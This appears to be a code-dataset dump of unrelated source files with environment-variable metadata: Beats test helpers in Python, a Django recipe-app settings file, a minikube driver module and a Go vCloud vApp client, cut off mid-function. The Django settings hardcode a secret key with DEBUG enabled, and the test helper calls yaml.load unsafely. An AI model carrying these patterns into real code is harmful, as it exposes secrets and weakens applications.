def read_output_json(self, output_file=None):
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
jsons = []
with open(os.path.join(self.working_dir, output_file), "r") as f:
for line in f:
if len(line) == 0 or line[len(line) - 1] != "\n":
# hit EOF
break
event = json.loads(line, object_pairs_hook=self.json_raise_on_duplicates)
del event['@metadata']
jsons.append(event)
return jsons
def json_raise_on_duplicates(self, ordered_pairs):
"""Reject duplicate keys. To be used as a custom hook in JSON unmarshaling
to error out in case of any duplicates in the keys."""
d = {}
for k, v in ordered_pairs:
if k in d:
raise ValueError("duplicate key: %r" % (k,))
else:
d[k] = v
return d
def copy_files(self, files, source_dir="files/"):
for file_ in files:
shutil.copy(os.path.join(source_dir, file_),
self.working_dir)
def setUp(self):
self.template_env = jinja2.Environment(
loader=jinja2.FileSystemLoader([
self.beat_path,
os.path.abspath(os.path.join(self.beat_path, "../libbeat"))
])
)
# create working dir
self.working_dir = os.path.abspath(os.path.join(
self.build_path + "run", self.id()))
if os.path.exists(self.working_dir):
shutil.rmtree(self.working_dir)
os.makedirs(self.working_dir)
fields_yml = os.path.join(self.beat_path, "fields.yml")
# Only add it if it exists
if os.path.isfile(fields_yml):
shutil.copyfile(fields_yml, os.path.join(self.working_dir, "fields.yml"))
try:
# update the last_run link
if os.path.islink(self.build_path + "last_run"):
os.unlink(self.build_path + "last_run")
os.symlink(self.build_path + "run/{}".format(self.id()),
self.build_path + "last_run")
except:
# symlink is best effort and can fail when
# running tests in parallel
pass
def wait_until(self, cond, max_timeout=10, poll_interval=0.1, name="cond"):
"""
Waits until the cond function returns true,
or until the max_timeout is reached. Calls the cond
function every poll_interval seconds.
If the max_timeout is reached before cond() returns
true, an exception is raised.
"""
start = datetime.now()
while not cond():
if datetime.now() - start > timedelta(seconds=max_timeout):
raise TimeoutError("Timeout waiting for '{}' to be true. ".format(name) +
"Waited {} seconds.".format(max_timeout))
time.sleep(poll_interval)
def get_log(self, logfile=None):
"""
Returns the log as a string.
"""
if logfile is None:
logfile = self.beat_name + ".log"
with open(os.path.join(self.working_dir, logfile), 'r') as f:
data = f.read()
return data
def wait_log_contains(self, msg, logfile=None,
max_timeout=10, poll_interval=0.1,
name="log_contains"):
self.wait_until(
cond=lambda: self.log_contains(msg, logfile),
max_timeout=max_timeout,
poll_interval=poll_interval,
name=name)
def log_contains(self, msg, logfile=None):
"""
Returns true if the give logfile contains the given message.
Note that the msg must be present in a single line.
"""
return self.log_contains_count(msg, logfile) > 0
def log_contains_count(self, msg, logfile=None):
"""
Returns the number of appearances of the given string in the log file
"""
counter = 0
# Init defaults
if logfile is None:
logfile = self.beat_name + ".log"
try:
with open(os.path.join(self.working_dir, logfile), "r") as f:
for line in f:
if line.find(msg) >= 0:
counter = counter + 1
except IOError:
counter = -1
return counter
def output_lines(self, output_file=None):
""" Count number of lines in a file."""
if output_file is None:
output_file = "output/" + self.beat_name
try:
with open(os.path.join(self.working_dir, output_file), "r") as f:
return sum([1 for line in f])
except IOError:
return 0
def output_has(self, lines, output_file=None):
"""
Returns true if the output has a given number of lines.
"""
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
try:
with open(os.path.join(self.working_dir, output_file), "r") as f:
return len([1 for line in f]) == lines
except IOError:
return False
def output_has_message(self, message, output_file=None):
"""
Returns true if the output has the given message field.
"""
try:
return any(line for line in self.read_output(output_file=output_file, required_fields=["message"])
if line.get("message") == message)
except (IOError, TypeError):
return False
def all_have_fields(self, objs, fields):
"""
Checks that the given list of output objects have
all the given fields.
Raises Exception if not true.
"""
for field in fields:
if not all([field in o for o in objs]):
raise Exception("Not all objects have a '{}' field"
.format(field))
def all_have_only_fields(self, objs, fields):
"""
Checks if the given list of output objects have all
and only the given fields.
Raises Exception if not true.
"""
self.all_have_fields(objs, fields)
self.all_fields_are_expected(objs, fields)
def all_fields_are_expected(self, objs, expected_fields,
dict_fields=[]):
"""
Checks that all fields in the objects are from the
given list of expected fields.
"""
for o in objs:
for key in o.keys():
known = key in dict_fields or key in expected_fields
ismeta = key.startswith('@metadata.')
if not(known or ismeta):
raise Exception("Unexpected key '{}' found"
.format(key))
def load_fields(self, fields_doc=None):
"""
Returns a list of fields to expect in the output dictionaries
and a second list that contains the fields that have a
dictionary type.
Reads these lists from the fields documentation.
"""
if fields_doc is None:
fields_doc = self.beat_path + "/_meta/fields.generated.yml"
def extract_fields(doc_list, name):
fields = []
dictfields = []
if doc_list is None:
return fields, dictfields
for field in doc_list:
# Skip fields without name entry
if "name" not in field:
continue
# Chain together names
if name != "":
newName = name + "." + field["name"]
else:
newName = field["name"]
if field.get("type") == "group":
subfields, subdictfields = extract_fields(field["fields"], newName)
fields.extend(subfields)
dictfields.extend(subdictfields)
else:
fields.append(newName)
if field.get("type") in ["object", "geo_point"]:
dictfields.append(newName)
return fields, dictfields
# Not all beats have a fields.generated.yml. Fall back to fields.yml
if not os.path.isfile(fields_doc):
fields_doc = self.beat_path + "/_meta/fields.yml"
# TODO: Make fields_doc path more generic to work with beat-generator
with open(fields_doc, "r") as f:
path = os.path.abspath(os.path.dirname(__file__) + "../../../../_meta/fields.generated.yml")
if not os.path.isfile(path):
path = os.path.abspath(os.path.dirname(__file__) + "../../../../_meta/fields.common.yml")
with open(path) as f2:
content = f2.read()
#content = "fields:\n"
content += f.read()
doc = yaml.load(content)
fields = []
dictfields = []
for item in doc:
subfields, subdictfields = extract_fields(item["fields"], "")
fields.extend(subfields)
dictfields.extend(subdictfields)
return fields, dictfields
def flatten_object(self, obj, dict_fields, prefix=""):
result = {}
for key, value in obj.items():
if isinstance(value, dict) and prefix + key not in dict_fields:
new_prefix = prefix + key + "."
result.update(self.flatten_object(value, dict_fields,
new_prefix))
else:
result[prefix + key] = value
return result
def copy_files(self, files, source_dir="files/", target_dir=""):
if target_dir:
target_dir = os.path.join(self.working_dir, target_dir)
else:
target_dir = self.working_dir
for file_ in files:
shutil.copy(os.path.join(source_dir, file_),
target_dir)
def output_count(self, pred, output_file=None):
"""
Returns true if the output line count predicate returns true
"""
# Init defaults
if output_file is None:
output_file = "output/" + self.beat_name
try:
with open(os.path.join(self.working_dir, output_file), "r") as f:
return pred(len([1 for line in f]))
except IOError:
return False
def get_elasticsearch_url(self):
"""
Returns an elasticsearch.Elasticsearch instance built from the
env variables like the integration tests.
"""
return "http://{host}:{port}".format(
host=os.getenv("ES_HOST", "localhost"),
port=os.getenv("ES_PORT", "9200"),
)
def get_kibana_url(self):
"""
Returns kibana host URL
"""
return "http://{host}:{port}".format(
host=os.getenv("KIBANA_HOST", "localhost"),
port=os.getenv("KIBANA_PORT", "5601"),
)
| [] | [] | [
"ES_HOST",
"ES_PORT",
"INTEGRATION_TESTS",
"KIBANA_HOST",
"KIBANA_PORT"
] | [] | ["ES_HOST", "ES_PORT", "INTEGRATION_TESTS", "KIBANA_HOST", "KIBANA_PORT"] | python | 5 | 0 | |
app/app/settings.py | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 2.1.15.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o97w%5e16s&_(o#_z$np4@s*%g40tbqvtk!62uxukfgs&0yc(j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
'recipe',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': os.environ.get('DB_HOST'),
'NAME': os.environ.get('DB_NAME'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASS'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = '/vol/web/media'
STATIC_ROOT = '/vol/web/static'
AUTH_USER_MODEL = 'core.user' | [] | [] | [
"DB_PASS",
"DB_USER",
"DB_NAME",
"DB_HOST"
] | [] | ["DB_PASS", "DB_USER", "DB_NAME", "DB_HOST"] | python | 4 | 0 | |
minikube/drivers/common.py | #!/usr/bin/env python
# -*- coding: utf-8
import os
def has_utility(cmd):
path = os.environ['PATH']
return any(os.access(os.path.join(p, cmd), os.X_OK) for p in path.split(os.pathsep))
def is_macos():
return os.uname()[0] == 'Darwin'
class Driver(object):
arch = "amd64"
@property
def name(self):
raise NotImplementedError("Subclass must set name")
@property
def arguments(self):
return "--vm-driver", self.name
class LinuxDriver(Driver):
os = "linux"
class MacDriver(Driver):
os = "darwin"
| [] | [] | [
"PATH"
] | [] | ["PATH"] | python | 1 | 0 | |
vendor/github.com/ukcloud/govcloudair/vapp.go | /*
* Copyright 2014 VMware, Inc. All rights reserved. Licensed under the Apache v2 License.
*/
package govcloudair
import (
"bytes"
"encoding/xml"
"fmt"
"log"
"net/url"
"os"
types "github.com/ukcloud/govcloudair/types/v56"
"strconv"
)
type VApp struct {
VApp *types.VApp
c *Client
}
func NewVApp(c *Client) *VApp {
return &VApp{
VApp: new(types.VApp),
c: c,
}
}
func (v *VCDClient) NewVApp(c *Client) VApp {
newvapp := NewVApp(c)
return *newvapp
}
func (v *VApp) Refresh() error {
if v.VApp.HREF == "" {
return fmt.Errorf("cannot refresh, Object is empty")
}
u, _ := url.ParseRequestURI(v.VApp.HREF)
req := v.c.NewRequest(map[string]string{}, "GET", *u, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return fmt.Errorf("error retrieving task: %s", err)
}
// Empty struct before a new unmarshal, otherwise we end up with duplicate
// elements in slices.
v.VApp = &types.VApp{}
if err = decodeBody(resp, v.VApp); err != nil {
return fmt.Errorf("error decoding task response: %s", err)
}
// The request was successful
return nil
}
func (v *VApp) AddVM(orgvdcnetworks []*types.OrgVDCNetwork, vapptemplate VAppTemplate, name string) (Task, error) {
vcomp := &types.ReComposeVAppParams{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Deploy: false,
Name: v.VApp.Name,
PowerOn: false,
Description: v.VApp.Description,
SourcedItem: &types.SourcedCompositionItemParam{
Source: &types.Reference{
HREF: vapptemplate.VAppTemplate.Children.VM[0].HREF,
Name: name,
},
InstantiationParams: &types.InstantiationParams{
NetworkConnectionSection: &types.NetworkConnectionSection{
Type: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.Type,
HREF: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.HREF,
Info: "Network config for sourced item",
PrimaryNetworkConnectionIndex: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.PrimaryNetworkConnectionIndex,
},
},
},
}
for index, orgvdcnetwork := range orgvdcnetworks {
vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection = append(vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection,
&types.NetworkConnection{
Network: orgvdcnetwork.Name,
NetworkConnectionIndex: index,
IsConnected: true,
IPAddressAllocationMode: "POOL",
},
)
vcomp.SourcedItem.NetworkAssignment = append(vcomp.SourcedItem.NetworkAssignment,
&types.NetworkAssignment{
InnerNetwork: orgvdcnetwork.Name,
ContainerNetwork: orgvdcnetwork.Name,
},
)
}
log.Printf("%s", vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection)
output, _ := xml.MarshalIndent(vcomp, " ", " ")
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/recomposeVApp"
log.Printf("[TRACE] Recompose XML: %s", string(output))
b := bytes.NewBufferString(xml.Header + string(output))
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.recomposeVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error instantiating a new VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding task response: %s", err)
}
return *task, nil
}
func (v *VApp) RemoveVM(vm VM) error {
v.Refresh()
task := NewTask(v.c)
if v.VApp.Tasks != nil {
for _, t := range v.VApp.Tasks.Task {
task.Task = t
err := task.WaitTaskCompletion()
if err != nil {
return fmt.Errorf("Error performing task: %#v", err)
}
}
}
vcomp := &types.ReComposeVAppParams{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
DeleteItem: &types.DeleteItem{
HREF: vm.VM.HREF,
},
}
output, _ := xml.MarshalIndent(vcomp, " ", " ")
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/recomposeVApp"
b := bytes.NewBufferString(xml.Header + string(output))
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.recomposeVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return fmt.Errorf("error instantiating a new vApp: %s", err)
}
task = NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return fmt.Errorf("error decoding task response: %s", err)
}
err = task.WaitTaskCompletion()
if err != nil {
return fmt.Errorf("Error performing task: %#v", err)
}
return nil
}
func (v *VApp) ComposeVApp(orgvdcnetworks []*types.OrgVDCNetwork, vapptemplate VAppTemplate, storageprofileref types.Reference, name string, description string) (Task, error) {
if vapptemplate.VAppTemplate.Children == nil || orgvdcnetworks == nil {
return Task{}, fmt.Errorf("can't compose a new vApp, objects passed are not valid")
}
// Build request XML
vcomp := &types.ComposeVAppParams{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
Deploy: false,
Name: name,
PowerOn: false,
Description: description,
InstantiationParams: &types.InstantiationParams{
NetworkConfigSection: &types.NetworkConfigSection{
Info: "Configuration parameters for logical networks",
},
},
SourcedItem: &types.SourcedCompositionItemParam{
Source: &types.Reference{
HREF: vapptemplate.VAppTemplate.Children.VM[0].HREF,
Name: vapptemplate.VAppTemplate.Children.VM[0].Name,
},
InstantiationParams: &types.InstantiationParams{
NetworkConnectionSection: &types.NetworkConnectionSection{
Type: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.Type,
HREF: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.HREF,
Info: "Network config for sourced item",
PrimaryNetworkConnectionIndex: vapptemplate.VAppTemplate.Children.VM[0].NetworkConnectionSection.PrimaryNetworkConnectionIndex,
},
},
},
}
for index, orgvdcnetwork := range orgvdcnetworks {
vcomp.InstantiationParams.NetworkConfigSection.NetworkConfig = append(vcomp.InstantiationParams.NetworkConfigSection.NetworkConfig,
types.VAppNetworkConfiguration{
NetworkName: orgvdcnetwork.Name,
Configuration: &types.NetworkConfiguration{
FenceMode: "bridged",
ParentNetwork: &types.Reference{
HREF: orgvdcnetwork.HREF,
Name: orgvdcnetwork.Name,
Type: orgvdcnetwork.Type,
},
},
},
)
vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection = append(vcomp.SourcedItem.InstantiationParams.NetworkConnectionSection.NetworkConnection,
&types.NetworkConnection{
Network: orgvdcnetwork.Name,
NetworkConnectionIndex: index,
IsConnected: true,
IPAddressAllocationMode: "POOL",
},
)
vcomp.SourcedItem.NetworkAssignment = append(vcomp.SourcedItem.NetworkAssignment,
&types.NetworkAssignment{
InnerNetwork: orgvdcnetwork.Name,
ContainerNetwork: orgvdcnetwork.Name,
},
)
}
if storageprofileref.HREF != "" {
vcomp.SourcedItem.StorageProfile = &storageprofileref
}
output, err := xml.MarshalIndent(vcomp, " ", " ")
if err != nil {
return Task{}, fmt.Errorf("error marshaling vapp compose: %s", err)
}
log.Printf("\n\nXML DEBUG: %s\n\n", string(output))
b := bytes.NewBufferString(xml.Header + string(output))
s := v.c.VCDVDCHREF
s.Path += "/action/composeVApp"
req := v.c.NewRequest(map[string]string{}, "POST", s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.composeVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error instantiating a new vApp: %s", err)
}
if err = decodeBody(resp, v.VApp); err != nil {
return Task{}, fmt.Errorf("error decoding vApp response: %s", err)
}
task := NewTask(v.c)
task.Task = v.VApp.Tasks.Task[0]
// The request was successful
return *task, nil
}
func (v *VApp) PowerOn() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/powerOn"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error powering on vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) PowerOff() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/powerOff"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error powering off vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Reboot() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/reboot"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error rebooting vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Reset() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/reset"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error resetting vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Suspend() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/suspend"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error suspending vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Shutdown() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/power/action/shutdown"
req := v.c.NewRequest(map[string]string{}, "POST", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error shutting down vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Undeploy() (Task, error) {
vu := &types.UndeployVAppParams{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
UndeployPowerAction: "powerOff",
}
output, err := xml.MarshalIndent(vu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/undeploy"
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.undeployVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error undeploy vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Deploy() (Task, error) {
vu := &types.DeployVAppParams{
Xmlns: "http://www.vmware.com/vcloud/v1.5",
PowerOn: false,
}
output, err := xml.MarshalIndent(vu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.HREF)
s.Path += "/action/deploy"
req := v.c.NewRequest(map[string]string{}, "POST", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.deployVAppParams+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error undeploy vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) Delete() (Task, error) {
s, _ := url.ParseRequestURI(v.VApp.HREF)
req := v.c.NewRequest(map[string]string{}, "DELETE", *s, nil)
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error deleting vApp: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) RunCustomizationScript(computername, script string) (Task, error) {
return v.Customize(computername, script, false)
}
func (v *VApp) Customize(computername, script string, changeSid bool) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
// Check if VApp Children is populated
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
vu := &types.GuestCustomizationSection{
Ovf: "http://schemas.dmtf.org/ovf/envelope/1",
Xsi: "http://www.w3.org/2001/XMLSchema-instance",
Xmlns: "http://www.vmware.com/vcloud/v1.5",
HREF: v.VApp.Children.VM[0].HREF,
Type: "application/vnd.vmware.vcloud.guestCustomizationSection+xml",
Info: "Specifies Guest OS Customization Settings",
Enabled: true,
ComputerName: computername,
CustomizationScript: script,
ChangeSid: false,
}
output, err := xml.MarshalIndent(vu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] VCD Client configuration: %s", output)
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/guestCustomizationSection/"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.guestCustomizationSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) GetStatus() (string, error) {
err := v.Refresh()
if err != nil {
return "", fmt.Errorf("error refreshing vapp: %v", err)
}
return types.VAppStatuses[v.VApp.Status], nil
}
func (v *VApp) GetNetworkConnectionSection() (*types.NetworkConnectionSection, error) {
networkConnectionSection := &types.NetworkConnectionSection{}
if v.VApp.Children.VM[0].HREF == "" {
return networkConnectionSection, fmt.Errorf("cannot refresh, Object is empty")
}
u, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF + "/networkConnectionSection/")
req := v.c.NewRequest(map[string]string{}, "GET", *u, nil)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.networkConnectionSection+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return networkConnectionSection, fmt.Errorf("error retrieving task: %s", err)
}
if err = decodeBody(resp, networkConnectionSection); err != nil {
return networkConnectionSection, fmt.Errorf("error decoding task response: %s", err)
}
// The request was successful
return networkConnectionSection, nil
}
func (v *VApp) ChangeCPUcount(size int) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
// Check if VApp Children is populated
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
newcpu := &types.OVFItem{
XmlnsRasd: "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData",
XmlnsVCloud: "http://www.vmware.com/vcloud/v1.5",
XmlnsXsi: "http://www.w3.org/2001/XMLSchema-instance",
VCloudHREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/cpu",
VCloudType: "application/vnd.vmware.vcloud.rasdItem+xml",
AllocationUnits: "hertz * 10^6",
Description: "Number of Virtual CPUs",
ElementName: strconv.Itoa(size) + " virtual CPU(s)",
InstanceID: 4,
Reservation: 0,
ResourceType: 3,
VirtualQuantity: size,
Weight: 0,
Link: &types.Link{
HREF: v.VApp.Children.VM[0].HREF + "/virtualHardwareSection/cpu",
Rel: "edit",
Type: "application/vnd.vmware.vcloud.rasdItem+xml",
},
}
output, err := xml.MarshalIndent(newcpu, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
debug := os.Getenv("GOVCLOUDAIR_DEBUG")
if debug == "true" {
fmt.Printf("\n\nXML DEBUG: %s\n\n", string(output))
}
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
s.Path += "/virtualHardwareSection/cpu"
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.rasdItem+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeStorageProfile(name string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
return Task{}, fmt.Errorf("vApp doesn't contain any children, aborting customization")
}
vdc, err := v.c.retrieveVDC()
storageprofileref, err := vdc.FindStorageProfileReference(name)
newprofile := &types.VM{
Name: v.VApp.Children.VM[0].Name,
StorageProfile: &storageprofileref,
Xmlns: "http://www.vmware.com/vcloud/v1.5",
}
output, err := xml.MarshalIndent(newprofile, " ", " ")
if err != nil {
fmt.Printf("error: %v\n", err)
}
log.Printf("[DEBUG] VCD Client configuration: %s", output)
b := bytes.NewBufferString(xml.Header + string(output))
s, _ := url.ParseRequestURI(v.VApp.Children.VM[0].HREF)
req := v.c.NewRequest(map[string]string{}, "PUT", *s, b)
req.Header.Add("Content-Type", "application/vnd.vmware.vcloud.vm+xml")
resp, err := checkResp(v.c.Http.Do(req))
if err != nil {
return Task{}, fmt.Errorf("error customizing VM: %s", err)
}
task := NewTask(v.c)
if err = decodeBody(resp, task.Task); err != nil {
return Task{}, fmt.Errorf("error decoding Task response: %s", err)
}
// The request was successful
return *task, nil
}
func (v *VApp) ChangeVMName(name string) (Task, error) {
err := v.Refresh()
if err != nil {
return Task{}, fmt.Errorf("error refreshing vapp before running customization: %v", err)
}
if v.VApp.Children == nil {
